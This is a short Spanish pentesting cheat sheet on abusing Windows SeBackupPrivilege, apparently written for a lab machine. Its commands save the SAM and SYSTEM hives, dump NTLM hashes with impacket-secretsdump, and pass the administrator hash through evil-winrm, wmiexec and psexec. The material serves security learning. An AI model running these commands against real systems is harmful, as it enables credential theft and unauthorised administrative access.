⚪ SeBackupPrivilege
Información
El grupo/privilegio SeBackupPrivilege
otorga a los usuarios capacidad de realizar copias en un contexto privilegiado.
(Para abusar de SeBackupPrivilege
, podemos realizar un volcado de la SAM
y obtener el hash del usuario administrator
)
Identificar Privilegios
Agregar Usuario Grupo
Añadir al usuario j.wilson
al grupo BackupOperators
.
net localgroup "Backup Operators" j.wilson /add
Verificar Privilegios Usuario
Con el comando whoami /priv
podemos verificar que el usuario j.wilson
forma parte del grupo SeBackupPrivilege
.
whoami /priv
Copia SAM/SYSTEM
Al disponer de privilegios altos para realizar copias, hago una copia del archivo SAM
y SYSTEM
.
reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
download sam
download system
Hash Dump
Con impacket-secretsdump
extraemos los hashes NTLM (NT) de los archivos SAM
y SYSTEM
.
impacket-secretsdump -system system -sam sam LOCAL
PassTheHash (PtH)
WINRM
evil-winrm -i 192.168.1.58 -u 'administrator' -H '41186fb28e283ff758bb3dbeb6fb4a5c'
SMB
wmiexec
impacket-wmiexec WORKGROUP/administrator@192.168.1.58 -hashes ':41186fb28e283ff758bb3dbeb6fb4a5c'
psexec
impacket-psexec -hashes ':41186fb28e283ff758bb3dbeb6fb4a5c' WORKGROUP/administrator@192.168.1.58 cmd.exe
